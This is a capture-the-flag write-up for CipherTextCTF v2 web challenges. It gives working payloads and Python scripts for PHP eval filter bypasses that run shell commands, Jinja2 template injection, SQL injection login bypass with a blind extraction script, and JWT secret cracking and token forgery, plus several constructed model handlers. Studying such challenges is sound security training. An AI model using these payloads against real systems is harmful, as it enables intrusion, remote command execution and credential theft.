CipherTextCTF v2 Capture the Flag Answers

Hi friends, today we're sharing our solutions to a popular Capture the Flag event, CipherTextCTF v2. Let's go through it step by step.

BabyPHP Level 1

Solution of Baby PHP Level1:

The challenge is basic: it reads the raw POST body through the php://input wrapper, unserializes it, and checks that the num element equals 13622.
So the payload is a serialized PHP array with a single integer element: a:1:{s:3:"num";i:13622;}

Flag: CTCTFB4by_Php_l3v3L_1_P4s53d
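To build this kind of payload without counting string lengths by hand, here is a small encoder for PHP's serialize() format in Python. It is an added example, not code from the original write-up; the challenge's source is not shown on the page, so the num check is assumed to be a plain equality on the unserialized array.

```python
def php_serialize(value):
    """Encode a Python value in PHP serialize() format.

    Supported: None, bool, int, str, list (becomes a 0-indexed array) and dict.
    That is enough for the unserialize() payloads used in CTF challenges.
    """
    if value is None:
        return "N;"
    if isinstance(value, bool):          # bool before int: True is also an int
        return "b:%d;" % int(value)
    if isinstance(value, int):
        return "i:%d;" % value
    if isinstance(value, str):
        # PHP stores the length in BYTES, not characters; a multi-byte string
        # serialized with its character count fails to unserialize.
        return 's:%d:"%s";' % (len(value.encode("utf-8")), value)
    if isinstance(value, list):
        value = dict(enumerate(value))
    if isinstance(value, dict):
        body = "".join(php_serialize(k) + php_serialize(v) for k, v in value.items())
        return "a:%d:{%s}" % (len(value), body)
    raise TypeError("unsupported type: %s" % type(value).__name__)


def babyphp1_payload(num=13622):
    """Array with a single 'num' key: the body to POST to the level 1 endpoint."""
    return php_serialize({"num": num})


if __name__ == "__main__":
    # Send it as the raw request body, which is what php://input reads, e.g.
    # requests.post(url, data=babyphp1_payload())
    print(babyphp1_payload())
```

The byte-length rule is the usual stumbling block when a payload has to carry non-ASCII data, which is why the encoder measures the UTF-8 form rather than the Python string.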

BabyPHP Level 2

Solution of BabyPHP Level 2:

First we analyze the code: it takes a POST request with a cmd parameter. cmd can't contain more than two consecutive letters, no dots (.) and no opening square bracket ([), and it must be shorter than 100 characters.

If we pass the check, the value reaches eval!
The challenge can be solved in two ways (maybe more, depending on your PHP skills).

First Method (PHP variable interpolation):

We need to list files. Every string fragment is at most two letters long, and the fragments are joined with double-quoted interpolation because the dot concatenation operator is blocked:
    $a='sy';
    $b='st';
    $c='em';
    $d="$a$b$c";   // the function name
    $d('ls');

Payload: $a='sy';%0a$b='st';%0a$c='em';%0a$d="$a$b$c";%0a$d('ls');

Read the flag mysecretflag2020ctctf_2020.txt (easy way: the glob m* matches it):
    $e='ca';
    $f='t ';
    $g='m*';
    $a='sy';
    $b='st';
    $c='em';
    $d="$a$b$c";
    $d("$e$f$g");  // cat m*

Payload: $e="ca";%0a$f="t%20";%0a$g="m*";%0a$a="sy";%0a$b="st";%0a$c="em";%0a$d="$a$b$c";%0a$d("$e$f$g");
 
Flag: CTCTFb4By_PhP_l3v3L_2_D0n3!!

Second Method (PHP heredoc string):

Listing files. The heredoc interpolates $b and $a, so $A becomes the function name; the bare words em, st and ls rely on PHP 7 treating an undefined constant as its own name:
    $a=em;
    $b=st;
    $A=<<<Z
    sy$b$a
    Z;
    $B=ls;
    ?><?=$A($B)?>

<?= "test" ?> is the same as <?php echo "test" ?>, so ?><?=$A($B)?> drops out of the eval'd code and immediately echoes the command output. The %0a newlines in the payload matter here: a heredoc body and its closing Z each need their own line, with nothing before the Z (required before PHP 7.3).

Payload: $a=em;%0a$b=st;%0a$A=<<<Z%0asy$b$a%0aZ;%0a$B=ls;%0a?><?=$A($B)?>

Reading the flag:
    $a='em';
    $b='st';
    $A=<<<Z
    sy$b$a
    Z;
    $c='t ';
    $e='m*';
    $B=<<<Z
    ca$c$e
    Z;
    $A($B);

Payload: $a='em';%0a$b='st';%0a$A=<<<Z%0asy$b$a%0aZ;%0a$c='t%20';%0a$e='m*';%0a$B=<<<Z%0aca$c$e%0aZ;%0a$A($B);

Flag: CTCTFb4By_PhP_l3v3L_2_D0n3!!
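Both methods above were assembled by hand. As an added example (not from the original write-up), here is a Python model of the level 2 filter exactly as the write-up describes it, plus a generator that splits any function name and argument into two-character pieces and emits the interpolation form used in the first method. The filter model is an assumption reconstructed from the text, since the real challenge source is not on the page.

```python
import re
from urllib.parse import unquote

MAX_LEN = 100  # "less than 100 characters", as the write-up describes the check


def cmd_passes_filter(cmd):
    """Model of the level 2 cmd filter: no three consecutive letters, no '.'
    or '[', fewer than 100 characters. Assumed from the write-up's description."""
    if len(cmd) >= MAX_LEN:
        return False
    if "." in cmd or "[" in cmd:
        return False
    return re.search(r"[A-Za-z]{3}", cmd) is None


def chunks(text, size=2):
    return [text[i:i + size] for i in range(0, len(text), size)]


def build_call(func, arg):
    """Emit PHP that calls func(arg) while never writing three letters in a row.

    Every string is split into pieces of at most two characters, each stored in
    a single-letter variable, and the pieces are joined with double-quoted
    interpolation ("$a$b$c") because the '.' operator is filtered.
    """
    names = iter("abcdefghijklmnopqrstuvwxyz")
    stmts = []

    def assemble(text):
        parts = []
        for piece in chunks(text):
            v = next(names)
            stmts.append("$%s='%s';" % (v, piece))
            parts.append("$" + v)
        return "".join(parts)                     # e.g. $a$b$c

    fn = assemble(func)                           # $a='sy';$b='st';$c='em';
    fn_var = next(names)
    stmts.append('$%s="%s";' % (fn_var, fn))      # $d="$a$b$c";
    stmts.append('$%s("%s");' % (fn_var, assemble(arg)))  # $d("$e$f$g");
    return "".join(stmts)


# The write-up's own first-method payload, URL-encoded as it goes in the POST body.
PAGE_PAYLOAD = "$a='sy';%0a$b='st';%0a$c='em';%0a$d=\"$a$b$c\";%0a$d('ls');"


def page_payload_ok():
    """Check the write-up's payload after URL-decoding, i.e. as PHP sees it."""
    return cmd_passes_filter(unquote(PAGE_PAYLOAD))


if __name__ == "__main__":
    php = build_call("system", "cat m*")
    print(php, cmd_passes_filter(php))
```

Running the generated string through cmd_passes_filter before sending it saves a round trip per attempt; the check is cheap and catches the usual mistake of letting a three-letter fragment such as "cat" slip through.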

Recipes Blog

Solution of Recipes Blog:

We have a simple blog with a search bar; if you type "test", it is reflected back to us.

So if we try the Flask/Jinja2 SSTI probe {{7*'7'}}, it returns 7777777 (string repetition, which tells us the input was evaluated as a template expression rather than plain arithmetic).

The flag is in the application configuration, which we can dump by typing {{config.items()}}

Flag: CTCTFFl4sk_SSt1_N3v3r_Die!!

Blog

Solution of Blog:

After directory brute-forcing there's a WordPress install under /secret. Running wpscan against it shows a plugin vulnerable to LFI, and the flag is read from /home/ctctf/flag.txt

SQLI101

Solution of SQLI101:

sqli101 filters all comment sequences and the "=" character, so we log in as admin with a comparison that uses neither: admin'or'1'<'2 (the string comparison '1'<'2' is always true)

SQLI102

Solution of SQLI102:

sqli102 filters spaces and all comment sequences. It's a blind SQL injection and can be solved in several ways; the space filter can be bypassed with %09, %0A, %0C, %0D, %0B, %a0 or parentheses (), and I decided to solve it with ().

Payload: admin'and(ascii(substr((select(password)from(users)where(username="admin")),1,1))>1)and'1'='1

#!/usr/bin/env python3
import string
import requests

url = "http://127.0.0.1/ciphertextv2/challenge7/admin.php"

flag = ""
length = 1
letters = string.printable

# Boolean-based blind extraction: one request per (position, candidate character).
# Parentheses stand in for every space so the payload passes the sqli102 filter.
while length < 70:
    for i in letters:
        payload = ("admin'and(ascii(substr((select(password)from(users)"
                   "where(username=\"admin\")),{},1))={})and'1'='1").format(length, ord(i))
        response = requests.post(url, data={"username": payload, "password": "ss", "login": "Login"})
        if "Correct" in response.text:
            print("[+] position {}: {!r}".format(length, i))
            flag += i
            break
    length += 1
print(flag)

Flag: CTCTfClouD_Y0u_eXpl41n_h0W_Bl1nd_5ql_inj3ct10n_w0rK_MaNu4l?
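To see both injections work end to end without the challenge servers, here is an added example (not from the original write-up) that models the sqli101 bypass and the sqli102 blind extraction against an in-memory SQLite table. The filters, the two login handlers and the users table are constructed from the descriptions above, not taken from the real challenge source; SQLite lacks MySQL's ascii(), so an equivalent is registered to keep the page's payload shape unchanged.

```python
import sqlite3
import string

SECRET_PASSWORD = "Bl1nd_5ql_w0rk5"   # constructed, stands in for the admin password


def make_db():
    """Constructed users table standing in for the challenge database."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (username TEXT, password TEXT)")
    conn.executemany("INSERT INTO users VALUES (?, ?)",
                     [("admin", SECRET_PASSWORD), ("guest", "guest")])
    # MySQL's ascii() does not exist in SQLite; register an equivalent so the
    # write-up's payload runs as written.
    conn.create_function("ascii", 1, lambda s: ord(s[0]) if s else 0)
    return conn


def sqli101_filter_ok(value):
    """sqli101 blocks '=' and comment sequences (as described on the page)."""
    return not any(tok in value for tok in ("=", "--", "#", "/*"))


def sqli102_filter_ok(value):
    """sqli102 blocks spaces and comment sequences (as described on the page)."""
    return not any(tok in value for tok in (" ", "--", "#", "/*"))


def login_sqli101(conn, username, password):
    """Constructed model of sqli101: one concatenated query on both fields.
    Deliberately vulnerable; returns the matched username or None."""
    query = ("SELECT username FROM users WHERE username='%s' AND password='%s'"
             % (username, password))
    row = conn.execute(query).fetchone()
    return row[0] if row else None


def login_sqli102(conn, username):
    """Constructed model of the sqli102 oracle: the username is looked up on its
    own and the page answers 'Correct' whenever a row comes back."""
    row = conn.execute("SELECT password FROM users WHERE username='%s'" % username).fetchone()
    return "Correct" if row else "Incorrect"


def sqli101_bypass(conn):
    # AND binds tighter than OR, so the WHERE clause reads
    # username='admin' OR ('1'<'2' AND password='wrong'): the admin row matches.
    payload = "admin'or'1'<'2"
    assert sqli101_filter_ok(payload)
    return login_sqli101(conn, payload, "wrong")


def sqli102_extract(conn, max_len=70):
    """Boolean-based blind extraction of the admin password, one character per
    position; parentheses replace every space so the filter passes."""
    extracted = ""
    for pos in range(1, max_len + 1):
        for ch in string.printable:
            payload = ("admin'and(ascii(substr((select(password)from(users)"
                       "where(username='admin')),%d,1))=%d)and'1'='1" % (pos, ord(ch)))
            assert sqli102_filter_ok(payload)
            if login_sqli102(conn, payload) == "Correct":
                extracted += ch
                break
        else:
            break          # no character matched: end of the password
    return extracted


if __name__ == "__main__":
    db = make_db()
    print("sqli101 logged in as:", sqli101_bypass(db))
    print("sqli102 extracted:", sqli102_extract(db))
```

The extraction loop stops at the first position where no printable character matches, which is the check the write-up's fixed-length script lacks; against a real target that also bounds the request count.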

BeAdmin

Solution of BeAdmin:

First we have a login page and we need valid creds (no SQL injection here). Valid creds: guest:guest

After logging in we can see a JWT is assigned to us, and it carries an attribute called userid, so we need to crack the JWT secret.

https://github.com/aress31/jwtcat.git

python3 jwtcat.py -t eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJ1c2VyaWQiOiJiZjU1YjYzNjI0NGM1OTc5NzA2ODBiOWNlMmZkZmUwNyIsImlhdCI6MTU4ODE2MjcyNH0.dgt5rsnCHRgs3P7SbDyZRfxDJGW766rc-UUk_8U3hEc -w /root/Desktop/HTB/rockyou.txt

secret key: aciddezoxiribonucleic

Now let's look at the userid. bf55b636244c597970680b9ce2fdfe07 is md5(17) reversed (the hex digest written backwards), so you can write a small script that brute-forces the number from 1 upwards.
The admin userid is 108 -> md5 -> reverse. Put it in the payload, sign a new JWT with the cracked secret key, and send a request with it.

Flag: CTCTFBr43k1nG_J50n_W3b_T0k3n
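The cracking and forging steps need only the Python standard library. This is an added example, not the write-up's script or jwtcat: it mints its own guest token under a constructed secret and wordlist, cracks it the way a dictionary attack does, recovers the number behind the reversed-md5 userid, and re-signs the token for userid 108 (the admin number the write-up reports). The captured guest token from the write-up is kept in a comment for reference only.

```python
import base64
import hashlib
import hmac
import json

# Write-up's captured guest token (header.payload.signature), for reference:
# eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJ1c2VyaWQiOiJiZjU1YjYzNjI0NGM1OTc5NzA2ODBiOWNlMmZkZmUwNyIsImlhdCI6MTU4ODE2MjcyNH0.dgt5rsnCHRgs3P7SbDyZRfxDJGW766rc-UUk_8U3hEc


def b64url(data):
    return base64.urlsafe_b64encode(data).rstrip(b"=").decode()


def b64url_decode(text):
    return base64.urlsafe_b64decode(text + "=" * (-len(text) % 4))


def jwt_hs256(claims, secret):
    """Mint an HS256 JWT: base64url(header).base64url(payload).base64url(HMAC)."""
    header = {"typ": "JWT", "alg": "HS256"}
    signing_input = (b64url(json.dumps(header, separators=(",", ":")).encode()) + "."
                     + b64url(json.dumps(claims, separators=(",", ":")).encode()))
    sig = hmac.new(secret.encode(), signing_input.encode(), hashlib.sha256).digest()
    return signing_input + "." + b64url(sig)


def decode_claims(token):
    """Read the payload without checking the signature (the first thing to do)."""
    return json.loads(b64url_decode(token.split(".")[1]))


def crack_hs256(token, wordlist):
    """Dictionary attack: re-sign header.payload with each candidate secret and
    compare against the token's own signature. Returns the secret or None."""
    signing_input, sig = token.rsplit(".", 1)
    target = b64url_decode(sig)
    for candidate in wordlist:
        guess = hmac.new(candidate.encode(), signing_input.encode(), hashlib.sha256).digest()
        if hmac.compare_digest(guess, target):
            return candidate
    return None


def userid_for(number):
    """The userid scheme as the write-up describes it: md5 of the decimal
    number, hex digest written backwards."""
    return hashlib.md5(str(number).encode()).hexdigest()[::-1]


def recover_number(userid, limit=10000):
    """Brute-force the number behind a reversed-md5 userid over 1..limit."""
    for n in range(1, limit + 1):
        if userid_for(n) == userid:
            return n
    return None


def forge_token(original, secret, number):
    """Keep the original claims, swap userid for the target number, re-sign."""
    claims = decode_claims(original)
    claims["userid"] = userid_for(number)
    return jwt_hs256(claims, secret)


if __name__ == "__main__":
    secret = "constructed-secret"                 # stands in for the cracked value
    guest = jwt_hs256({"userid": userid_for(17), "iat": 1588162724}, secret)
    cracked = crack_hs256(guest, ["123456", "password", secret])
    print("guest number:", recover_number(decode_claims(guest)["userid"]))
    print("admin token:", forge_token(guest, cracked, 108))
```

The dictionary attack works because HS256 verification is just recomputing the MAC; with the real rockyou.txt as the wordlist this is the same computation jwtcat performs, only slower in pure Python.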

Store

Solution of Store:

The idea: we can't borrow more than 500 and the flag costs 1337, but when we buy the flag or any other item the request carries a CSRF token, and that token is just base64 of a JSON document holding our balance:

{"username":"m4rv3l","balance":500,"timestamp":1588170035}

So we can edit the balance, re-encode it, and send the request to buy the flag:

{"username":"m4rv3l","balance":5000,"timestamp":1588170035} -> base64
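Here is the tampering step in Python alongside the server-side change that defeats it. This is an added example, not the challenge's code: the two purchase handlers are constructed models, the token contents are the values quoted above, and the signing key and server-side balance table are assumptions.

```python
import base64
import hashlib
import hmac
import json

# Token contents as quoted in the write-up (the store base64-encodes this JSON).
ORIGINAL_CLAIMS = {"username": "m4rv3l", "balance": 500, "timestamp": 1588170035}
FLAG_PRICE = 1337


def encode_token(claims):
    return base64.b64encode(json.dumps(claims, separators=(",", ":")).encode()).decode()


def decode_token(token):
    return json.loads(base64.b64decode(token))


def tamper_balance(token, new_balance):
    """Decode, rewrite the balance field, re-encode. No key is needed because
    nothing authenticates the token."""
    claims = decode_token(token)
    claims["balance"] = new_balance
    return encode_token(claims)


def buy_vulnerable(token, price):
    """Constructed model of the challenge: the server trusts the balance the
    client sent back inside the token."""
    return decode_token(token)["balance"] >= price


def sign_token(token, key):
    return hmac.new(key, token.encode(), hashlib.sha256).hexdigest()


def buy_hardened(token, mac, price, key, balances):
    """Fixed version: the token must carry a valid HMAC, and even then the
    balance is read from the server-side table, never from the client."""
    if not hmac.compare_digest(sign_token(token, key), mac):
        return False                       # tampered or forged token
    user = decode_token(token)["username"]
    return balances.get(user, 0) >= price


if __name__ == "__main__":
    token = encode_token(ORIGINAL_CLAIMS)
    print("buy flag with real balance:", buy_vulnerable(token, FLAG_PRICE))
    forged = tamper_balance(token, 5000)
    print("buy flag with edited balance:", buy_vulnerable(forged, FLAG_PRICE))
```

The MAC alone would already reject the edited token, but the hardened handler still ignores the client-supplied balance: signing a value you should never have sent to the client is a weaker fix than not sending it.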

Bypass Me

Solution of Bypass Me:

PHP type juggling: we send both POST parameters as arrays. A string function handed an array returns NULL with a warning instead of a real result, and NULL loosely compares equal to 0, so the comparison passes; giving the two arrays different values keeps any "the two inputs must differ" check happy at the same time.

Payload: username[]=a&password[]=b

That's it, we're done with CipherTextCTF v2.
